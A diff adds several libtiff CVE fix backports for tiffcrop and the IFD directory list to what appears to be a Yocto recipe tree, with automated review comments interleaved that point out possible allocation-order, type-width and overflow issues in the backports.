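+ tif->tif_dirnumber++;
+
+- if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
+- uint64* new_dirlist;
+-
++ if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
++ uint64 *new_dirlist;
+ /*
+ * XXX: Reduce memory allocation granularity of the dirlist
+ * array.
+ */
+- new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
+- tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
++ if (tif->tif_dirnumber >= 32768)
++ tif->tif_dirlistsize = 65535;
++ else
++ tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
++
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
++ tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
+ if (!new_dirlist)
+ return 0;
+- if( tif->tif_dirnumber >= 32768 )
+- tif->tif_dirlistsize = 65535;
+- else
+- tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
+- tif->tif_dirlist = new_dirlist;
++ tif->tif_dirlistoff = new_dirlist;
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
++ tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
++ if (!new_dirlist)
++ return 0;
++ tif->tif_dirlistdirn = (uint16 *)new_dirlist;
+ }
+
+- tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
+
+ return 1;
+-}
++} /* --- _TIFFCheckDirNumberAndOffset() ---*/
+
+ /*
+ * Check the count field of a directory entry against a known value. The
+@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
+ }
+
+ /*
++ * Retrieve the matching IFD directory number of a given IFD offset
++ * from the list of directories already seen.
++ * Returns 1 if the offset was in the list and the directory number
++ * can be returned.
++ * Otherwise returns 0 or if an error occured.
++ */
++int
++_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
++{
++ uint16 n;
++
++ if (diroff == 0) /* no more directories */
++ return 0;
++ if (tif->tif_dirnumber == 65535) {
++ TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
++ "Cannot handle more than 65535 TIFF directories");
++ return 0;
++ }
++
++ /* Check if offset is already in the list and return matching directory number.
++ * Otherwise update IFD list using TIFFNumberOfDirectories()
++ * and search again in IFD list.
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ TIFFNumberOfDirectories(tif);
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ return 0;
++} /*--- _TIFFGetDirNumberFromOffset() ---*/
++
++
++/*
+ * Read IFD structure from the specified offset. If the pointer to
+ * nextdiroff variable has been specified, read it too. Function returns a
+ * number of fields in the directory or 0 if failed.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
++++ tiff-4.1.0+git191117/libtiff/tif_open.c
+@@ -353,7 +353,8 @@ TIFFClientOpen(
+ if (!TIFFDefaultDirectory(tif))
+ goto bad;
+ tif->tif_diroff = 0;
+- tif->tif_dirlist = NULL;
++ tif->tif_dirlistoff = NULL;
++ tif->tif_dirlistdirn = NULL;
+ tif->tif_dirlistsize = 0;
+ tif->tif_dirnumber = 0;
+ return (tif);
+--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
++++ tiff-4.1.0+git191117/libtiff/tiffiop.h
+@@ -145,7 +145,8 @@ struct tiff {
+ #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
+ uint64 tif_diroff; /* file offset of current directory */
+ uint64 tif_nextdiroff; /* file offset of following directory */
+- uint64* tif_dirlist; /* list of offsets to already seen directories to prevent IFD looping */
++ uint64* tif_dirlistoff; /* list of offsets to already seen directories to prevent IFD looping */
++ uint16* tif_dirlistdirn; /* list of directory numbers to already seen directories to prevent IFD looping */
+ uint16 tif_dirlistsize; /* number of entries in offset list */
+ uint16 tif_dirnumber; /* number of already seen directories */
+ TIFFDirectory tif_dir; /* internal rep of current directory */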
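Review bot: In `_TIFFCheckDirNumberAndOffset()` (the tif_dirread.c part of this patch) `tif_dirnumber` is incremented and `tif_dirlistsize` is raised before either `_TIFFCheckRealloc()` call has succeeded, so a failed reallocation returns 0 with both counters ahead of the two arrays. A later call can then skip the grow branch and index `tif_dirlistoff[]` / `tif_dirlistdirn[]` past what was actually allocated. I would compute the new capacity in a local, store it in `tif_dirlistsize` only after both arrays were grown, undo the `tif_dirnumber` increment on failure, and keep the second result in a `uint16 *` instead of routing it through the `uint64 *new_dirlist` temporary, as sketched below. Separately, the added messages print `uint64` offsets with `0x%lx (%lu)`, which does not match the argument width where `long` is 32 bits; the unchanged context in `TIFFReadDirectory()` uses `TIFF_UINT64_FORMAT` for the same kind of value. Part of the function body lies between the two hunks and is not shown.

```c
/* … unchanged: loop check and offset-update passes, tif->tif_dirnumber++ … */
if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
    uint64 *new_off;
    uint16 *new_dirn;
    uint16 new_size = (tif->tif_dirnumber >= 32768) ? 65535 : (uint16)(2 * tif->tif_dirnumber);

    new_off = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
        new_size, sizeof(uint64), "for IFD offset list");
    if (!new_off) {
        tif->tif_dirnumber--;   /* nothing was added */
        return 0;
    }
    tif->tif_dirlistoff = new_off;

    new_dirn = (uint16 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
        new_size, sizeof(uint16), "for IFD dirnumber list");
    if (!new_dirn) {
        tif->tif_dirnumber--;   /* nothing was added */
        return 0;
    }
    tif->tif_dirlistdirn = new_dirn;

    /* publish the capacity only once both arrays really have it */
    tif->tif_dirlistsize = new_size;
}
/* … unchanged: store diroff and dirn at index tif_dirnumber - 1 … */
```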
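--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
+From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Sat, 21 Jan 2023 15:58:10 +0000
+Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
+CVE: CVE-2022-48281
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiffcrop.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a0789a3..8aed9cd 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+- prev_cropsize = seg_buffs[0].size;
++ prev_cropsize = seg_buffs[i].size;
+ if (prev_cropsize < cropsize)
+ {
+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);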
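--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
+From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:26:43 +0100
+Subject: [PATCH] CVE-2023-0795
+
+This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
+CVE-2023-0799.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
+ 1 file changed, 30 insertions(+), 21 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 8aed9cd..f21a7d7 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -277,7 +277,6 @@ struct region {
+ uint32 width; /* width in pixels */
+ uint32 length; /* length in pixels */
+ uint32 buffsize; /* size of buffer needed to hold the cropped region */
+- unsigned char *buffptr; /* address of start of the region */
+ };
+
+ /* Cropping parameters from command line and image data
+@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **);
++ unsigned char **, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
+ cps->regionlist[i].width = 0;
+ cps->regionlist[i].length = 0;
+ cps->regionlist[i].buffsize = 0;
+- cps->regionlist[i].buffptr = NULL;
+ cps->zonelist[i].position = 0;
+ cps->zonelist[i].total = 0;
+ }
+@@ -6358,8 +6356,13 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ image->adjustments & ROTATE_ANY);
+ return (-1);
+ }
+-
+- if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
++
++ /* Dummy variable in order not to switch two times the
++ * image->width,->length within rotateImage(),
++ * but switch xres, yres there. */
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ /* These should not be needed for composite images */
+ crop->regionlist[i].width = crop_width;
+ crop->regionlist[i].length = crop_length;
+- crop->regionlist[i].buffptr = crop_buff;
+
+ src_rowsize = ((img_width * bps * spp) + 7) / 8;
+ dst_rowsize = (((crop_width * bps * count) + 7) / 8);
+@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image, struct crop_mask *crop,
+
+ crop->regionlist[region].width = crop_width;
+ crop->regionlist[region].length = crop_length;
+- crop->regionlist[region].buffptr = crop_buff;
+
+ src = read_buff;
+ dst = crop_buff;
+@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff))
++ &crop->combined_length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff))
++ &crop->regionlist[i].length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr))
++ &crop->combined_length, crop_buff_ptr, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr)
++ uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+
+ case 270: if ((bps % 8) == 0) /* byte aligned data */
+@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+ default:
+ break;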
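Review bot: In the `correct_orientation()` hunk the two new locals are declared as `uint32_t` after executable statements, while the rest of the file and the `rotateImage()` definition in this same patch use libtiff's own `uint32` (`uint32 *img_width`, `uint32 *img_length`). Passing `&width` and `&length` therefore relies on `uint32_t` and `uint32` being the same underlying type on every target, and the mid-block declaration needs a C99 compiler; both look like leftovers from the newer upstream sources this was backported from. I would write `uint32 width = image->width;` and `uint32 length = image->length;` so the backport matches the 4.1.0 code it is applied to. The body of `correct_orientation()` continues outside the hunk.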
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
1From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
2From: Markus Koschany <apo@debian.org>
3Date: Tue, 21 Feb 2023 14:39:52 +0100
4Subject: [PATCH] CVE-2023-0800
5
6This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
7CVE-2023-0804.
8
9Bug-Debian: https://bugs.debian.org/1031632
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
11
12Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
13CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804
14Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
15---
16 tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
17 1 file changed, 69 insertions(+), 4 deletions(-)
18
19diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
20index f21a7d7..742615a 100644
21--- a/tools/tiffcrop.c
22+++ b/tools/tiffcrop.c
23@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
24
25 crop->regionlist[i].buffsize = buffsize;
26 crop->bufftotal += buffsize;
27+
28+ /* For composite images with more than one region, the
29+ * combined_length or combined_width always needs to be equal,
30+ * respectively.
31+ * Otherwise, even the first section/region copy
32+ * action might cause buffer overrun. */
33 if (crop->img_mode == COMPOSITE_IMAGES)
34 {
35 switch (crop->edge_ref)
36 {
37 case EDGE_LEFT:
38 case EDGE_RIGHT:
39+ if (i > 0 && zlength != crop->combined_length)
40+ {
41+ TIFFError(
42+ "computeInputPixelOffsets",
43+ "Only equal length regions can be combined for "
44+ "-E left or right");
45+ return (-1);
46+ }
47 crop->combined_length = zlength;
48 crop->combined_width += zwidth;
49 break;
50 case EDGE_BOTTOM:
51 case EDGE_TOP: /* width from left, length from top */
52 default:
53+ if (i > 0 && zwidth != crop->combined_width)
54+ {
55+ TIFFError("computeInputPixelOffsets",
56+ "Only equal width regions can be "
57+ "combined for -E "
58+ "top or bottom");
59+ return (-1);
60+ }
61 crop->combined_width = zwidth;
62 crop->combined_length += zlength;
63 break;
64@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
65 crop->combined_width = 0;
66 crop->combined_length = 0;
67
68+ /* If there is more than one region, check beforehand whether all the width
69+ * and length values of the regions are the same, respectively. */
70+ switch (crop->edge_ref)
71+ {
72+ default:
73+ case EDGE_TOP:
74+ case EDGE_BOTTOM:
75+ for (i = 1; i < crop->selections; i++)
76+ {
77+ uint32_t crop_width0 =
78+ crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
79+ uint32_t crop_width1 =
80+ crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
81+ if (crop_width0 != crop_width1)
82+ {
83+ TIFFError("extractCompositeRegions",
84+ "Only equal width regions can be combined for -E "
85+ "top or bottom");
86+ return (1);
87+ }
88+ }
89+ break;
90+ case EDGE_LEFT:
91+ case EDGE_RIGHT:
92+ for (i = 1; i < crop->selections; i++)
93+ {
94+ uint32_t crop_length0 =
95+ crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
96+ uint32_t crop_length1 =
97+ crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
98+ if (crop_length0 != crop_length1)
99+ {
100+ TIFFError("extractCompositeRegions",
101+ "Only equal length regions can be combined for "
102+ "-E left or right");
103+ return (1);
104+ }
105+ }
106+ }
107+
108+
109 for (i = 0; i < crop->selections; i++)
110 {
111 /* rows, columns, width, length are expressed in pixels */
112@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
113 default:
114 case EDGE_TOP:
115 case EDGE_BOTTOM:
116- if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
117- {
118+ if ((crop->selections > i + 1) &&
119+ (crop_width != crop->regionlist[i + 1].width))
120+ {
121 TIFFError ("extractCompositeRegions",
122 "Only equal width regions can be combined for -E top or bottom");
123 return (1);
124@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
125 break;
126 case EDGE_LEFT: /* splice the pieces of each row together, side by side */
127 case EDGE_RIGHT:
128- if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
129- {
130+ if ((crop->selections > i + 1) &&
131+ (crop_length != crop->regionlist[i + 1].length))
132+ {
133 TIFFError ("extractCompositeRegions",
134 "Only equal length regions can be combined for -E left or right");
135 return (1);
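Review bot: In the pre-check loop added to extractCompositeRegions, `crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1` (and the y2/y1 counterpart) is evaluated in uint32_t, so a region whose end coordinate is below its start would wrap to a large value instead of being rejected. Whether an earlier stage guarantees x1 <= x2 and y1 <= y2 is not visible in these hunks; if it does not, a guard such as `if (crop->regionlist[i].x2 < crop->regionlist[i].x1) return (1);` before the subtraction would close that gap. The later in-loop checks read `crop->regionlist[i + 1].width` and `.length` instead of deriving them from the coordinates, so a one-line comment naming where those fields are filled in would let a reader confirm that both checks agree. All the functions touched here continue outside the hunks.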
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
1From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
2From: zhailiangliang <zhailiangliang@loongson.cn>
3Date: Thu, 16 Mar 2023 16:16:54 +0800
4Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
5
6CVE: CVE-2023-1916
7Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
8Signed-off-by: Marek Vasut <marex@denx.de>
9---
10 archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
11 1 file changed, 45 insertions(+), 17 deletions(-)
12
13--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
14+++ tiff-4.1.0+git191117/tools/tiffcrop.c
15@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
16 crop->combined_width += (uint32)zwidth;
17 else
18 crop->combined_width = (uint32)zwidth;
19+
20+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
21+ if (((crop->rotation == 90) || (crop->rotation == 270))
22+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
23+ {
24+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
25+ return -1;
26+ }
27+
28 break;
29 case EDGE_BOTTOM: /* width from left, zones from bottom to top */
30 zwidth = offsets.crop_width;
31@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
32 else
33 crop->combined_length = (uint32)zlength;
34 crop->combined_width = (uint32)zwidth;
35+
36+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
37+ if (((crop->rotation == 90) || (crop->rotation == 270))
38+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
39+ {
40+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
41+ return -1;
42+ }
43+
44 break;
45 case EDGE_RIGHT: /* zones from right to left, length from top */
46 zlength = offsets.crop_length;
47@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
48 crop->combined_width += (uint32)zwidth;
49 else
50 crop->combined_width = (uint32)zwidth;
51+
52+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
53+ if (((crop->rotation == 90) || (crop->rotation == 270))
54+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
55+ {
56+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
57+ return -1;
58+ }
59+
60 break;
61 case EDGE_TOP: /* width from left, zones from top to bottom */
62 default:
63@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
64 else
65 crop->combined_length = (uint32)zlength;
66 crop->combined_width = (uint32)zwidth;
67+
68+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
69+ if (((crop->rotation == 90) || (crop->rotation == 270))
70+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
71+ {
72+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
73+ return -1;
74+ }
75+
76 break;
77 } /* end switch statement */
78
79@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
80 * regardless of the way the data are organized in the input file.
81 * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
82 */
83- img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
84- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
85- trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
86+ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
87+ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
88+ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
89
90 #ifdef DEVELMODE
91 TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
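Review bot: The boundary test added to each of the four EDGE_* cases in getCropOffsets compares `crop->combined_length` with `image->width` and `crop->combined_width` with `image->length`, and the comment `check the boundary` does not say why the dimensions are crossed. I would reword it to `/* For 90/270 the combined crop length is checked against the image width and the combined width against the image length */`. The same block is pasted four times; a small static helper called from each case would keep the copies from drifting apart. The test runs after `combined_width += (uint32)zwidth`, so it relies on that addition not wrapping, which cannot be confirmed from the hunk. The header records `Upstream-Status: Submitted`, and the last hunk in extractImageSection appears to change only whitespace, so it is worth re-checking against upstream that this file is the complete fix.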
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
1From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 3 Feb 2023 15:31:31 +0100
4Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
5 fix#520 rotateImage() set up a new buffer and calculates its size
6 individually. Therefore, seg_buffs[] size needs to be updated accordingly.
7 Before this fix, the seg_buffs buffer size was calculated with a different
8 formula than within rotateImage().
9
10Closes #520.
11
12Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
13CVE: CVE-2023-25433
14Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
15---
16 tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
17 1 file changed, 56 insertions(+), 13 deletions(-)
18
19diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
20index 742615a..aab0ec6 100644
21--- a/tools/tiffcrop.c
22+++ b/tools/tiffcrop.c
23@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
24 static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
25 uint32, uint32, uint8 *, uint8 *);
26 static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
27- unsigned char **, int);
28+ unsigned char **, size_t *);
29 static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
30 unsigned char *);
31 static int invertImage(uint16, uint16, uint16, uint32, uint32,
32@@ -6384,7 +6384,7 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
33 * but switch xres, yres there. */
34 uint32_t width = image->width;
35 uint32_t length = image->length;
36- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
37+ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
38 {
39 TIFFError ("correct_orientation", "Unable to rotate image");
40 return (-1);
41@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
42
43 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
44 {
45+ /* rotateImage() set up a new buffer and calculates its size
46+ * individually. Therefore, seg_buffs size needs to be updated
47+ * accordingly. */
48+ size_t rot_buf_size = 0;
49 if (rotateImage(crop->rotation, image, &crop->combined_width,
50- &crop->combined_length, &crop_buff, FALSE))
51+ &crop->combined_length, &crop_buff, &rot_buf_size))
52 {
53 TIFFError("processCropSelections",
54 "Failed to rotate composite regions by %d degrees", crop->rotation);
55@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
56
57 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
58 {
59- if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
60- &crop->regionlist[i].length, &crop_buff, FALSE))
61+ /* Furthermore, rotateImage() set up a new buffer and calculates
62+ * its size individually. Therefore, seg_buffs size needs to be
63+ * updated accordingly. */
64+ size_t rot_buf_size = 0;
65+ if (rotateImage(
66+ crop->rotation, image, &crop->regionlist[i].width,
67+ &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
68 {
69 TIFFError("processCropSelections",
70 "Failed to rotate crop region by %d degrees", crop->rotation);
71@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
72 crop->combined_width = total_width;
73 crop->combined_length = total_length;
74 seg_buffs[i].buffer = crop_buff;
75- seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
76- * image->spp) * crop->regionlist[i].length;
77+ seg_buffs[i].size = rot_buf_size;
78 }
79 }
80 }
81@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
82
83 /* Copy the crop section of the data from the current image into a buffer
84 * and adjust the IFD values to reflect the new size. If no cropping is
85- * required, use the origial read buffer as the crop buffer.
86 *
87 * There is quite a bit of redundancy between this routine and the more
88 * specialized processCropSelections, but this provides
89@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
90 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
91 {
92 if (rotateImage(crop->rotation, image, &crop->combined_width,
93- &crop->combined_length, crop_buff_ptr, TRUE))
94+ &crop->combined_length, crop_buff_ptr, NULL))
95 {
96 TIFFError("createCroppedImage",
97 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
